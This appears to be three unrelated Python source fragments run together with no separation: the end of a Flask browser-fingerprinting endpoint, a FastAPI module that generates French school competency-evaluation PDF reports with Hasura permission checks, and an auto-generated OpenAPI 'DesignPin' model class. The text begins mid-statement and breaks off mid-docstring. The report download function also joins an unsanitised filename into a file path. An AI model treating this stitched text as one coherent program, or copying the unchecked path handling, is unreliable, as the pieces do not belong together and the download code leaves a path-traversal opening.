flask.request.cookies.get(USER_ID_KEY) headers = request_headers( 'User-Agent', 'Accept-Language', 'Accept-Encoding', 'DNT' ) other_data = json.loads(flask.request.form['fingerprint']) process_js_data(other_data) results = database.add_fingerprint( database.JavaScriptFingerprint, user_id, collection_datetime, headers, js_data=other_data ) return flask.jsonify(**results) def request_headers(*headers): return [(header, flask.request.headers.get(header)) for header in headers] def process_js_data(js_data): canvas = next(pair for pair in js_data if pair[0] == 'Canvas hash') canvas[1] = canvas_hash(canvas[1]) webgl = next(pair for pair in js_data if pair[0] == 'WebGL hash') webgl[1] = canvas_hash(webgl[1]) def canvas_hash(canvas_str): if canvas_str == 'undefined': return canvas_str return sha256(canvas_str.encode()).hexdigest() @app.route('/error-report', methods=['POST']) def error_report(): form = flask.request.form report = '\n'.join('{}: {}'.format(k, form[k]) for k in form) print('ERROR REPORT:\n' + report) return flask.render_template('error-report.html') @app.route('/about') def about(): return flask.render_template('about.html') @app.route('/contact') def contact(): return flask.render_template('contact.html') kreako/soklaki from collections import defaultdict from zipfile import ZipFile from datetime import date import json import re from pydantic import BaseModel, Field from fastapi.responses import FileResponse from fastapi.exceptions import HTTPException from typing import Optional from fpdf import FPDF, HTMLMixin from path import Path import jwt from gql_client import GqlClientException CURRENT_DIR = Path(__file__).abspath().dirname() class HasuraHeaders(BaseModel): x_hasura_user_id: int = Field(alias="x-hasura-user-id") 
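    # Hasura session variables: the acting user id and group id. gql_report later verifies that
    # this group matches the user's group as well as the period's and the student's group before
    # a report is generated.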
x_hasura_user_group: int = Field(alias="x-hasura-user-group") class ReportData(BaseModel): student_id: int period_id: int class ReportInput(BaseModel): input: ReportData session_variables: HasuraHeaders class ReportOutput(BaseModel): report_id: int pdf_path: str json_path: str async def report(gql_client, reports_dir, input: ReportInput): # Gather data - will check permissions and raise HTTPException(500) if necessary data = await gql_report( gql_client, input.input.student_id, input.input.period_id, input.session_variables.x_hasura_user_id, input.session_variables.x_hasura_user_group, ) # Now generation pdf = PDF() # Header pdf.add_page() with pdf.edit().font_bold().text_lg().text_black() as e: e.write("Rapport d'évaluation du socle commun", align="C") e.write(f"{data['period']['group']['name']}", align="C") e.write( f"{data['student']['firstname']} {data['student']['lastname']} - {data['student']['cycle']}", align="C", ) e.empty_line() y_start_of_general_info = pdf.get_y() output_general_info(pdf, data) # Graphics data pdf.set_y(pdf.get_y() + 30) # Per domains for l1 in data["socle"]: domain = data["container_by_id"][l1["id"]] with pdf.edit().style_label() as e: e.write(f"{domain['full_rank']} {domain['text']}") output_bar_progression( pdf, data["evaluations_count_by_domain_status"][l1["id"]]["NotAcquired"], data["evaluations_count_by_domain_status"][l1["id"]]["InProgress"], data["evaluations_count_by_domain_status"][l1["id"]]["Acquired"], data["evaluations_count_by_domain_status"][l1["id"]]["TipTop"], data["evaluations_count_by_domain"][l1["id"]], ) pdf.set_y(pdf.get_y() + 1) # Total pdf.set_y(pdf.get_y() + 10) with pdf.edit().style_label() as e: e.write("Total") output_bar_progression( pdf, data["evaluations_count_by_status"]["not_acquired"], data["evaluations_count_by_status"]["in_progress"], data["evaluations_count_by_status"]["acquired"], data["evaluations_count_by_status"]["tip_top"], data["evaluations_count_by_status"]["total"], ) # Legend pdf.set_y(y_start_of_general_info) output_legend(pdf) # Summary by competencies for l1_raw in data["socle"]: l1_id = l1_raw["id"] l1 = data["container_by_id"][l1_id] pdf.add_page() with pdf.edit().font_bold().text_gray_700() as e: e.write(f"{l1['full_rank']} {l1['text'].upper()}") for l2_idx, l2_raw in enumerate(l1_raw["children"]): l2_id = l2_raw["id"] l2 = data["container_by_id"][l2_id] with pdf.edit().text_gray_700() as e: if l2_idx > 0: e.empty_line() e.write(f"{l2['full_rank']} {l2['text']}") e.empty_line() if l2_raw["competencies"]: output_competency_legend(pdf) for competency_raw in l2_raw["competencies"]: competency_id = competency_raw["id"] output_competency_table(pdf, competency_id, data) if l1_raw["competencies"]: output_competency_legend(pdf) for competency_raw in l1_raw["competencies"]: competency_id = competency_raw["id"] output_competency_table(pdf, competency_id, data) # Details of competencies pdf.add_page() for l1_idx, l1_raw in enumerate(data["socle"]): l1_id = l1_raw["id"] l1 = data["container_by_id"][l1_id] output_domain_needed = True def output_domain(): nonlocal output_domain_needed if output_domain_needed: # pdf.add_page() with pdf.edit().font_bold().text_gray_700() as e: if l1_idx > 0: e.empty_line() e.empty_line() e.write(f"{l1['full_rank']} {l1['text'].upper()}") output_domain_needed = False for l2_idx, l2_raw in enumerate(l1_raw["children"]): l2_id = l2_raw["id"] l2 = data["container_by_id"][l2_id] output_sub_domain_needed = True def output_sub_domain(): nonlocal output_sub_domain_needed if output_sub_domain_needed: 
with pdf.edit().text_gray_700() as e: if l2_idx > 0: e.empty_line() e.write(f"{l2['full_rank']} {l2['text']}") e.empty_line() output_sub_domain_needed = False for competency_raw in l2_raw["competencies"]: competency_id = competency_raw["id"] output_competency( pdf, competency_id, data, output_domain, output_sub_domain ) for competency_raw in l1_raw["competencies"]: competency_id = competency_raw["id"] output_competency( pdf, competency_id, data, output_domain, output_sub_domain ) # Eval comments pdf.add_page() with pdf.edit().font_bold().text_lg().text_black() as e: e.write("Commentaire") e.empty_line() if data["comments"]: with pdf.edit().style_normal() as e: e.write(f"{data['comments'][0]['text']}") # Observations pdf.add_page() with pdf.edit().font_bold().text_lg().text_black() as e: e.write("Annexe - Les observations") e.empty_line() for observation in data["observations"]: with pdf.edit().style_normal() as e: e.write(f"Observation pour :") with pdf.edit().style_label() as e: for c in observation["competencies"]: competency_id = c["competency_id"] competency = data["competency_by_id"][competency_id] e.write(f"{competency['full_rank']} {competency['text']}", indent=1) with pdf.edit().style_normal() as e: e.write(f"{observation['text']}") e.empty_line() # Output prefix = f"{data['period']['group']['name']}_{data['period']['name']}_{data['student']['cycle']}_{data['student']['firstname']}_{data['student']['lastname']}" prefix = make_safe_filename(prefix) pdf_fname = f"{prefix}.pdf" dirname = ( Path(reports_dir) / f"{data['period']['group_id']}" / f"{input.input.period_id}" ) dirname.makedirs_p() pdf_path = dirname / pdf_fname pdf.output(pdf_path) json_fname = f"{prefix}.json" json_path = dirname / json_fname with open(json_path, "w") as f: f.write(json.dumps(data, indent=2)) # Make older report inactive await inactivate_old_report( gql_client, input.input.student_id, input.input.period_id ) # Add the report to the database id = await insert_report( gql_client, input.input.student_id, data["student"]["cycle"], data["period"]["end"], json_path, pdf_path, ) return ReportOutput( report_id=id, pdf_path=pdf_path, json_path=json_path, ) def output_legend(pdf): with pdf.edit().fill_gray_200().text_sm() as e: y = pdf.get_y() e.rect(153, y, 47, e.line_height * 5) pdf.set_y(y + e.line_height / 2) with pdf.edit().text_sm() as e: y = pdf.get_y() e.fill_red_600() e.rect(188, y, 10, e.line_height) pdf.cell(w=176, h=e.line_height, txt="Maîtrise insuffisante", ln=1, align="R") y = pdf.get_y() e.fill_yellow_600() e.rect(188, y, 10, e.line_height) pdf.cell(w=176, h=e.line_height, txt="Maîtrise fragile", ln=1, align="R") y = pdf.get_y() e.fill_green_600() e.rect(188, y, 10, e.line_height) pdf.cell(w=176, h=e.line_height, txt="Maîtrise satisfaisante", ln=1, align="R") y = pdf.get_y() e.fill_pink_600() e.rect(188, y, 10, e.line_height) pdf.cell(w=176, h=e.line_height, txt="Très bonne maîtrise", ln=1, align="R") def output_general_info(pdf, data): with pdf.edit().style_label() as e: e.write("Date du rapport") with pdf.edit().style_normal() as e: e.write(f"{data['period']['end']}") with pdf.edit().style_label() as e: e.write("Nom") with pdf.edit().style_normal() as e: e.write(f"{data['student']['lastname']}") with pdf.edit().style_label() as e: e.write("Prénom") with pdf.edit().style_normal() as e: e.write(f"{data['student']['firstname']}") with pdf.edit().style_label() as e: e.write("Cycle") with pdf.edit().style_normal() as e: e.write(f"Cycle {data['student']['cycle'][-1]}") with pdf.edit().style_label() as e: 
e.write("Date d'anniversaire") with pdf.edit().style_normal() as e: e.write(f"{data['student']['birthdate']}") with pdf.edit().style_label() as e: e.write("Date d'entrée à l'école") with pdf.edit().style_normal() as e: e.write(f"{data['student']['school_entry']}") if data["student"]["school_exit"]: with pdf.edit().style_label() as e: e.write("Date de sortie de l'école") with pdf.edit().style_normal() as e: e.write(f"{data['student']['school_exit']}") def output_bar_progression(pdf, not_acquired, in_progress, acquired, tiptop, total): y = pdf.get_y() x = 10 with pdf.edit() as e: e.fill_gray_700() e.rect(10, y, 190, 8) l = 190 * not_acquired / total e.fill_red_600() e.rect(x, y + 1, l, 6) x += l l = 190 * in_progress / total e.fill_yellow_600() e.rect(x, y + 1, l, 6) x += l l = 190 * acquired / total e.fill_green_600() e.rect(x, y + 1, l, 6) x += l l = 190 * tiptop / total e.fill_pink_600() e.rect(x, y + 1, l, 6) pdf.set_y(y + 10) MARKER_WIDTH = 8 RIGHT_STOP = 200 - 4 * MARKER_WIDTH # 10 for page right margin def output_competency_table(pdf, competency_id, data): competency = data["competency_by_id"][competency_id] evaluations = data["evaluations_by_competency_id"][competency_id] if evaluations: status = evaluations[0]["status"] else: status = "InProgress" with pdf.edit().text_gray_700().draw_gray_900() as e: txt = f"{competency['full_rank']} {competency['text']}" lines = len( pdf.multi_cell( w=RIGHT_STOP - 10, # -10 for page left margin h=e.line_height, txt=txt, split_only=True, ) ) y = pdf.get_y() if y + lines * e.line_height >= 297 - 15 - 10: # 10 margin, 15 footer pdf.add_page() y = pdf.get_y() pdf.multi_cell( w=RIGHT_STOP - 10, # -10 for page left margin h=e.line_height, txt=txt, ln=1, align="L", border="BTRL", ) if status == "NotAcquired": e.fill_red_600() else: e.fill_white() e.rect(RIGHT_STOP + 0 * MARKER_WIDTH, y, MARKER_WIDTH, e.line_height * lines) e.borders(RIGHT_STOP + 0 * MARKER_WIDTH, y, MARKER_WIDTH, e.line_height * lines) if status == "InProgress": e.fill_yellow_600() else: e.fill_white() e.rect(RIGHT_STOP + 1 * MARKER_WIDTH, y, MARKER_WIDTH, e.line_height * lines) e.borders(RIGHT_STOP + 1 * MARKER_WIDTH, y, MARKER_WIDTH, e.line_height * lines) if status == "Acquired": e.fill_green_600() else: e.fill_white() e.rect(RIGHT_STOP + 2 * MARKER_WIDTH, y, MARKER_WIDTH, e.line_height * lines) e.borders(RIGHT_STOP + 2 * MARKER_WIDTH, y, MARKER_WIDTH, e.line_height * lines) if status == "TipTop": e.fill_pink_600() else: e.fill_white() e.rect(RIGHT_STOP + 3 * MARKER_WIDTH, y, MARKER_WIDTH, e.line_height * lines) e.borders(RIGHT_STOP + 3 * MARKER_WIDTH, y, MARKER_WIDTH, e.line_height * lines) def output_competency_legend(pdf): ANGLE = 60 y = pdf.get_y() pdf.set_y(y) pdf.set_x(RIGHT_STOP + 0 * MARKER_WIDTH + 2) with pdf.rotation(angle=ANGLE): with pdf.edit().text_xs() as e: pdf.cell( w=0, h=e.line_height, txt="Insuffisante", align="L", ln=1, ) pdf.set_y(y) pdf.set_x(RIGHT_STOP + 1 * MARKER_WIDTH + 2) with pdf.rotation(angle=ANGLE): with pdf.edit().text_xs() as e: pdf.cell( w=0, h=e.line_height, txt="Fragile", align="L", ln=1, ) pdf.set_y(y) pdf.set_x(RIGHT_STOP + 2 * MARKER_WIDTH + 2) with pdf.rotation(angle=ANGLE): with pdf.edit().text_xs() as e: pdf.cell( w=0, h=e.line_height, txt="Satisfaisante", align="L", ln=1, ) pdf.set_y(y) pdf.set_x(RIGHT_STOP + 3 * MARKER_WIDTH + 2) with pdf.rotation(angle=ANGLE): with pdf.edit().text_xs() as e: pdf.cell( w=0, h=e.line_height, txt="Bonne", align="L", ln=1, ) # pdf.set_y(pdf.get_y() + 5) # pdf.set_x(10) def output_competency(pdf, competency_id, 
data, output_domain, output_sub_domain): competency = data["competency_by_id"][competency_id] write_needed = False observations = data["observations_by_competency_id"][competency_id] len_observations = len(observations) if len_observations > 0: write_needed = True evaluations = data["evaluations_by_competency_id"][competency_id] len_evaluations = len(evaluations) comment = None if len_evaluations > 0: evaluation = evaluations[0] if evaluation["comment"]: comment = evaluation["comment"] write_needed = True if not write_needed: return output_domain() output_sub_domain() output_competency_table(pdf, competency_id, data) if len_observations > 0: with pdf.edit().text_sm().text_gray_700().font_mono() as e: e.empty_line() if len_observations > 1: e.write(f"{len_observations} observations", indent=1) else: e.write("1 observation", indent=1) e.empty_line() if comment: with pdf.edit().style_normal() as e: if len_observations == 0: e.empty_line() e.write(comment, indent=1) e.empty_line() class PDF(FPDF, HTMLMixin): def __init__(self, total_pages=True, *args, **kwargs): super().__init__(*args, **kwargs) self.total_pages = total_pages self.add_font("dejavu", fname=CURRENT_DIR / "DejaVuSerif.ttf", uni=True) self.add_font( "dejavu-bold", fname=CURRENT_DIR / "DejaVuSerif-Bold.ttf", uni=True ) self.add_font("dejavu-mono", fname=CURRENT_DIR / "DejaVuSansMono.ttf", uni=True) self.black_and_white = True def footer(self): # Position at 1.5 cm from bottom self.set_y(-15) # helvetica italic 8 self.set_font("helvetica", "I", 8) # Page number if self.total_pages: self.cell(0, 10, "Page " + str(self.page_no()) + "/{nb}", 0, 0, "C") else: self.cell(0, 10, "Page " + str(self.page_no()), 0, 0, "C") def edit(self): return PdfWriter(self) class PdfWriter(object): def __init__(self, pdf): self.pdf = pdf self.line_height = 10 self.font_normal() self.text_base() self.text_black() def __enter__(self): return self def __exit__(self, exc_type, exc_val, exc_tb): pass def write(self, txt, indent=0, align="L"): # 10 is the default left margin self.pdf.set_x(10 + indent * 10) self.pdf.multi_cell(w=0, h=self.line_height, txt=txt, ln=1, align=align) def write_with_marker(self, txt): self.pdf.rect( self.pdf.get_x(), self.pdf.get_y() + self.line_height / 4, 10, self.line_height / 2, "F", ) self.pdf.set_x(self.pdf.get_x() + 20) self.pdf.cell(w=0, h=self.line_height, txt=txt, ln=1) def empty_line(self): self.pdf.cell(w=0, h=self.line_height, txt="", ln=1) def rect(self, x, y, w, h): self.pdf.rect(x, y, w, h, "F") def borders(self, x, y, w, h): self.pdf.rect(x, y, w, h, "D") def style_label(self): return self.font_normal().text_sm().text_gray_700() def style_normal(self): return self.font_normal().text_base().text_black() def font_normal(self): self.pdf.set_font("dejavu") return self def font_bold(self): self.pdf.set_font("dejavu-bold") return self def font_mono(self): self.pdf.set_font("dejavu-mono") return self def text_lg(self): self.pdf.set_font_size(14) self.line_height = 10 return self def text_xl(self): self.pdf.set_font_size(12) self.line_height = 8 return self def text_base(self): self.pdf.set_font_size(10) self.line_height = 6 return self def text_sm(self): self.pdf.set_font_size(8) self.line_height = 4 return self def text_xs(self): self.pdf.set_font_size(6) self.line_height = 2 return self def text_xxs(self): self.pdf.set_font_size(5) self.line_height = 1 return self def text_gray_700(self): self.pdf.set_text_color(0x37, 0x41, 0x51) return self def text_black(self): self.pdf.set_text_color(0x11, 0x18, 0x27) return self def 
text_red_600(self): self.pdf.set_text_color(0xDC, 0x26, 0x26) return self def text_yellow_600(self): self.pdf.set_text_color(0xD9, 0x77, 0x06) return self def text_green_600(self): self.pdf.set_text_color(0x05, 0x96, 0x69) return self def text_blue_600(self): self.pdf.set_text_color(0x25, 0x63, 0xEB) return self def text_pink_600(self): self.pdf.set_text_color(0xDB, 0x27, 0x77) return self def draw_gray_900(self): self.pdf.set_draw_color(0x11, 0x18, 0x27) return self def fill_white(self): self.pdf.set_fill_color(0xFF, 0xFF, 0xFF) return self def fill_gray_50(self): self.pdf.set_fill_color(0xF9, 0xFA, 0xFB) return self def fill_gray_100(self): self.pdf.set_fill_color(0xF3, 0xF4, 0xF6) return self def fill_gray_200(self): self.pdf.set_fill_color(0xE5, 0xE7, 0xEB) return self def fill_gray_300(self): self.pdf.set_fill_color(0xD1, 0xD5, 0xDB) return self def fill_gray_400(self): self.pdf.set_fill_color(0x9C, 0xA3, 0xAF) return self def fill_gray_500(self): self.pdf.set_fill_color(0x6B, 0x72, 0x80) return self def fill_gray_600(self): self.pdf.set_fill_color(0x4B, 0x55, 0x63) return self def fill_gray_700(self): self.pdf.set_fill_color(0x37, 0x41, 0x51) return self def fill_gray_800(self): self.pdf.set_fill_color(0x1F, 0x29, 0x37) return self def fill_gray_900(self): self.pdf.set_fill_color(0x11, 0x18, 0x27) return self def fill_black(self): self.pdf.set_fill_color(0x11, 0x18, 0x27) return self def fill_red_600(self): if self.pdf.black_and_white: return self.fill_gray_600() self.pdf.set_fill_color(0xDC, 0x26, 0x26) return self def fill_yellow_600(self): if self.pdf.black_and_white: return self.fill_gray_500() self.pdf.set_fill_color(0xD9, 0x77, 0x06) return self def fill_green_600(self): if self.pdf.black_and_white: return self.fill_gray_400() self.pdf.set_fill_color(0x05, 0x96, 0x69) return self def fill_blue_600(self): self.pdf.set_fill_color(0x25, 0x63, 0xEB) return self def fill_pink_600(self): if self.pdf.black_and_white: return self.fill_gray_300() self.pdf.set_fill_color(0xDB, 0x27, 0x77) return self async def gql_period(gql_client, period_id, student_id): r = await gql_client.run_query( """ query Period($student_id: bigint!, $period_id: Int!) 
{ period: eval_period_by_pk(id: $period_id) { active end group_id group { name } id name start students(where: {student_id: {_eq: $student_id}}) { cycle student { id active birthdate firstname group_id lastname school_entry school_exit } } } } """, {"student_id": student_id, "period_id": period_id}, ) period = r["data"]["period"] relation = period["students"][0] cycle = relation["cycle"] student = relation["student"] student["cycle"] = cycle return (period, student) async def gql_report( gql_client, student_id, period_id, x_hasura_user_id, x_hasura_user_group ): # Check permissions and gather first info group_id = (await gql_client.user_by_id(x_hasura_user_id))["group_id"] if group_id != x_hasura_user_group: raise HTTPException(500) period, student = await gql_period(gql_client, period_id, student_id) if group_id != period["group_id"]: raise HTTPException(500) if group_id != student["group_id"]: raise HTTPException(500) if not period["active"]: raise HTTPException(500) if not student["active"]: raise HTTPException(500) r = await gql_client.run_query( """ query Report( $student_id: bigint!, $cycle: cycle!, $period_end: date!, $group_id: bigint!, ) { evaluations: eval_evaluation( where: { active: {_eq: true} student_id: {_eq: $student_id} competency: {cycle: {_eq: $cycle}, active: {_eq: true}} date: {_lte: $period_end} } order_by: {date: desc} ) { id created_at updated_at date competency_id status user_id comment } observations: eval_observation( where: { active: {_eq: true} competencies: {competency: {cycle: {_eq: $cycle}, active: {_eq: true}}} complete: {complete: {_eq: true}} date: {_lte: $period_end} students: {student_id: {_eq: $student_id}} }, order_by: {date: desc} ) { id created_at updated_at date competencies(where: {competency: {active: {_eq: true}}}) { competency_id } text user_id } comments: eval_comment( where: { active: {_eq: true}, student_id: {_eq: $student_id}, date: {_lte: $period_end} } order_by: {updated_at: desc}, ) { id date created_at updated_at text user_id } socle: socle_container( where: { cycle: { _eq: $cycle } container_id: { _is_null: true } active: { _eq: true } group_id: { _eq: $group_id } } order_by: { alpha_full_rank: asc } ) { id children( where: { active: { _eq: true } group_id: { _eq: $group_id } } order_by: { alpha_full_rank: asc } ) { id competencies( where: { active: { _eq: true } group_id: { _eq: $group_id } } order_by: { alpha_full_rank: asc } ) { id } } competencies( where: { active: { _eq: true } group_id: { _eq: $group_id } } order_by: { alpha_full_rank: asc } ) { id } } competencies: socle_competency( where: { active: { _eq: true } group_id: { _eq: $group_id } } ) { container_id cycle full_rank id rank text } containers: socle_container( where: { active: { _eq: true } group_id: { _eq: $group_id } } ) { id container_id full_rank cycle rank text } } """, { "period_end": period["end"], "student_id": student_id, "cycle": student["cycle"], "group_id": group_id, }, ) data = r["data"] data["period"] = period data["student"] = student data["container_by_id"] = { container["id"]: container for container in data["containers"] } data["competency_by_id"] = { competency["id"]: competency for competency in data["competencies"] } if data["comments"]: data["comment"] = data["comments"][0] else: data["comment"] = None data["observations_by_competency_id"] = defaultdict(list) for observation in data["observations"]: for competency in observation["competencies"]: data["observations_by_competency_id"][competency["competency_id"]].append( observation ) 
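    # Evaluations are grouped per competency in the same way; the query orders them by date
    # descending, so index 0 is always the most recent evaluation, which is what
    # output_competency_table reads.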
data["evaluations_by_competency_id"] = defaultdict(list) for evaluation in data["evaluations"]: data["evaluations_by_competency_id"][evaluation["competency_id"]].append( evaluation ) # Compute competencies -> domain domains = {} # domain -> nb competencies total = defaultdict(int) for l1 in data["socle"]: for l2 in l1["children"]: for c in l2["competencies"]: domains[c["id"]] = l1["id"] total[l1["id"]] += 1 for c in l1["competencies"]: domains[c["id"]] = l1["id"] total[l1["id"]] += 1 # Now sort evaluations count by domain and status evaluations = { l1["id"]: { "NotAcquired": 0, "InProgress": 0, "Acquired": 0, "TipTop": 0, } for l1 in data["socle"] } for evaluation in data["evaluations"]: domain = domains[evaluation["competency_id"]] status = evaluation["status"] evaluations[domain][status] += 1 # Now move non evaluated to "InProgress" for l1_id in evaluations: evaluations[l1_id]["InProgress"] += total[l1_id] - ( evaluations[l1_id]["NotAcquired"] + evaluations[l1_id]["InProgress"] + evaluations[l1_id]["Acquired"] + evaluations[l1_id]["TipTop"] ) data["evaluations_count_by_domain_status"] = evaluations data["evaluations_count_by_domain"] = total # Grand total not_acquired = 0 in_progress = 0 acquired = 0 tip_top = 0 for l1_id in evaluations: not_acquired += evaluations[l1_id]["NotAcquired"] in_progress += evaluations[l1_id]["InProgress"] acquired += evaluations[l1_id]["Acquired"] tip_top += evaluations[l1_id]["TipTop"] data["evaluations_count_by_status"] = { "not_acquired": not_acquired, "in_progress": in_progress, "acquired": acquired, "tip_top": tip_top, "total": not_acquired + in_progress + acquired + tip_top, } return data def make_safe_filename(s): def safe_char(c): if c.isalnum() or c == ".": return c else: return "_" fname = "".join(safe_char(c) for c in s).rstrip("_") fname = re.sub("_{2,}", "_", fname) return fname async def inactivate_old_report(gql_client, student_id, period_id): r = await gql_client.run_query( """ mutation Inactivate($student_id: Int!, $period_id: Int!) { update_report( where: { student_id: {_eq: $student_id}, period: {eval_period_id: {_eq: $period_id}} } _set: {active: false} ) { affected_rows } }""", {"student_id": student_id, "period_id": period_id}, ) return r["data"]["update_report"]["affected_rows"] async def insert_report(gql_client, student_id, cycle, date, json_path, pdf_path): r = await gql_client.run_query( """ mutation InsertReport($student_id: Int!, $cycle: cycle!, $date: date!, $json_path: String!, $pdf_path: String!) 
{ insert_report_one( object: { active: true, cycle: $cycle, date: $date, json_path: $json_path, pdf_path: $pdf_path, student_id: $student_id } ) { id } } """, { "student_id": student_id, "cycle": cycle, "date": date, "json_path": json_path, "pdf_path": pdf_path, }, ) return r["data"]["insert_report_one"]["id"] async def dl_report( reports_dir, group_id: int, period_id: int, filename: str, token: str, hasura_graphql_jwt_secret, ): t = jwt.decode(token, hasura_graphql_jwt_secret, algorithms=["HS256"]) token_group_id = int(t["https://hasura.io/jwt/claims"]["x-hasura-user-group"]) if group_id != token_group_id: return None file_path = Path(reports_dir) / f"{group_id}" / f"{period_id}" / filename return FileResponse(file_path, media_type="application/pdf") async def dl_zip_reports( gql_client, reports_dir, group_id: int, period_id: int, token: str, hasura_graphql_jwt_secret, ): t = jwt.decode(token, hasura_graphql_jwt_secret, algorithms=["HS256"]) token_group_id = int(t["https://hasura.io/jwt/claims"]["x-hasura-user-group"]) if group_id != token_group_id: return None dir_path = Path(reports_dir) / f"{group_id}" / f"{period_id}" group = await gql_client.group_by_id(group_id) period = await gql_client.period_by_id(period_id) zip_fname = make_safe_filename(f"{group['name']}_{period['name']}.zip") virtual_path = Path(make_safe_filename(f"{group['name']}_{period['name']}")) zip_path = dir_path / zip_fname with ZipFile(zip_path, "w") as myzip: for pdf in dir_path.listdir("*.pdf"): myzip.write(pdf, arcname=virtual_path / pdf.basename()) return FileResponse(zip_path, media_type="application/zip", filename=zip_fname) # coding: utf-8 """ PowerMeter API API # noqa: E501 The version of the OpenAPI document: 2021.4.1 Generated by: https://openapi-generator.tech """ import pprint import re # noqa: F401 import six from powermeter_api.configuration import Configuration class DesignPin(object): """NOTE: This class is auto generated by OpenAPI Generator. Ref: https://openapi-generator.tech Do not edit the class manually. """ """ Attributes: openapi_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. 
""" openapi_types = { 'id': 'int', 'name': 'str', 'direction': 'str', 'type': 'str', 'bus': 'str', 'bus_index': 'int', 'bundle': 'str', 'bundle_index': 'int', 'pin_caps': 'list[PinCap]', 'power_count': 'int', 'function': 'str', 'internal_node': 'str' } attribute_map = { 'id': 'id', 'name': 'name', 'direction': 'direction', 'type': 'type', 'bus': 'bus', 'bus_index': 'bus_index', 'bundle': 'bundle', 'bundle_index': 'bundle_index', 'pin_caps': 'pin_caps', 'power_count': 'power_count', 'function': 'function', 'internal_node': 'internal_node' } def __init__(self, id=None, name=None, direction=None, type=None, bus=None, bus_index=None, bundle=None, bundle_index=None, pin_caps=None, power_count=None, function=None, internal_node=None, local_vars_configuration=None): # noqa: E501 """DesignPin - a model defined in OpenAPI""" # noqa: E501 if local_vars_configuration is None: local_vars_configuration = Configuration() self.local_vars_configuration = local_vars_configuration self._id = None self._name = None self._direction = None self._type = None self._bus = None self._bus_index = None self._bundle = None self._bundle_index = None self._pin_caps = None self._power_count = None self._function = None self._internal_node = None self.discriminator = None if id is not None: self.id = id self.name = name self.direction = direction self.type = type self.bus = bus self.bus_index = bus_index self.bundle = bundle self.bundle_index = bundle_index if pin_caps is not None: self.pin_caps = pin_caps if power_count is not None: self.power_count = power_count self.function = function self.internal_node = internal_node @property def id(self): """Gets the id of this DesignPin. # noqa: E501 :return: The id of this DesignPin. # noqa: E501 :rtype: int """ return self._id @id.setter def id(self, id): """Sets the id of this DesignPin. :param id: The id of this DesignPin. # noqa: E501 :type: int """ self._id = id @property def name(self): """Gets the name of this DesignPin. # noqa: E501 :return: The name of this DesignPin. # noqa: E501 :rtype: str """ return self._name @name.setter def name(self, name): """Sets the name of this DesignPin. :param name: The name of this DesignPin. # noqa: E501 :type: str """ if self.local_vars_configuration.client_side_validation and name is None: # noqa: E501 raise ValueError("Invalid value for `name`, must not be `None`") # noqa: E501 if (self.local_vars_configuration.client_side_validation and name is not None and len(name) < 1): raise ValueError("Invalid value for `name`, length must be greater than or equal to `1`") # noqa: E501 self._name = name @property def direction(self): """Gets the direction of this DesignPin. # noqa: E501 :return: The direction of this DesignPin. # noqa: E501 :rtype: str """ return self._direction @direction.setter def direction(self, direction): """Sets the direction of this DesignPin. :param direction: The direction of this DesignPin. # noqa: E501 :type: str """ if self.local_vars_configuration.client_side_validation and direction is None: # noqa: E501 raise ValueError("Invalid value for `direction`, must not be `None`") # noqa: E501 allowed_values = ["input", "output", "inout", "internal"] # noqa: E501 if self.local_vars_configuration.client_side_validation and direction not in allowed_values: # noqa: E501 raise ValueError( "Invalid value for `direction` ({0}), must be one of {1}" # noqa: E501 .format(direction, allowed_values) ) self._direction = direction @property def type(self): """Gets the type of this DesignPin. 
# noqa: E501 :return: The type of this DesignPin. # noqa: E501 :rtype: str """ return self._type @type.setter def type(self, type): """Sets the type of this DesignPin. :param type: The type of this DesignPin. # noqa: E501 :type: str """ if (self.local_vars_configuration.client_side_validation and type is not None and len(type) < 1): raise ValueError("Invalid value for `type`, length must be greater than or equal to `1`") # noqa: E501 self._type = type @property def bus(self): """Gets the bus of this DesignPin. # noqa: E501 :return: The bus of this DesignPin. # noqa: E501 :rtype: str """ return self._bus @bus.setter def bus(self, bus): """Sets the bus of this DesignPin. :param bus: The bus of this DesignPin. # noqa: E501 :type: str """ if (self.local_vars_configuration.client_side_validation and bus is not None and len(bus) < 1): raise ValueError("Invalid value for `bus`, length must be greater than or equal to `1`") # noqa: E501 self._bus = bus @property def bus_index(self): """Gets the bus_index of this DesignPin. # noqa: E501 :return: The bus_index of this DesignPin. # noqa: E501 :rtype: int """ return self._bus_index @bus_index.setter def bus_index(self, bus_index): """Sets the bus_index of this DesignPin. :param bus_index: The bus_index of this DesignPin. # noqa: E501 :type: int """ if (self.local_vars_configuration.client_side_validation and bus_index is not None and bus_index > 2147483647): # noqa: E501 raise ValueError("Invalid value for `bus_index`, must be a value less than or equal to `2147483647`") # noqa: E501 if (self.local_vars_configuration.client_side_validation and bus_index is not None and bus_index < -2147483648): # noqa: E501 raise ValueError("Invalid value for `bus_index`, must be a value greater than or equal to `-2147483648`") # noqa: E501 self._bus_index = bus_index @property def bundle(self): """Gets the bundle of this DesignPin. # noqa: E501 :return: The bundle of this DesignPin. # noqa: E501 :rtype: str """ return self._bundle @bundle.setter def bundle(self, bundle): """Sets the bundle of this DesignPin. :param bundle: The bundle of this DesignPin. # noqa: E501 :type: str """ if (self.local_vars_configuration.client_side_validation and bundle is not None and len(bundle) < 1): raise ValueError("Invalid value for `bundle`, length must be greater than or equal to `1`") # noqa: E501 self._bundle = bundle @property def bundle_index(self): """Gets the bundle_index of this DesignPin. # noqa: E501 :return: The bundle_index of this DesignPin. # noqa: E501 :rtype: int """ return self._bundle_index @bundle_index.setter def bundle_index(self, bundle_index): """Sets the bundle_index of this DesignPin. :param bundle_index: The bundle_index of this DesignPin. # noqa: E501 :type: int """ if (self.local_vars_configuration.client_side_validation and bundle_index is not None and bundle_index > 2147483647): # noqa: E501 raise ValueError("Invalid value for `bundle_index`, must be a value less than or equal to `2147483647`") # noqa: E501 if (self.local_vars_configuration.client_side_validation and bundle_index is not None and bundle_index < 0): # noqa: E501 raise ValueError("Invalid value for `bundle_index`, must be a value greater than or equal to `0`") # noqa: E501 self._bundle_index = bundle_index @property def pin_caps(self): """Gets the pin_caps of this DesignPin. # noqa: E501 :return: The pin_caps of this DesignPin. # noqa: E501 :rtype: list[PinCap] """ return self._pin_caps @pin_caps.setter def pin_caps(self, pin_caps): """Sets the pin_caps of this DesignPin. 
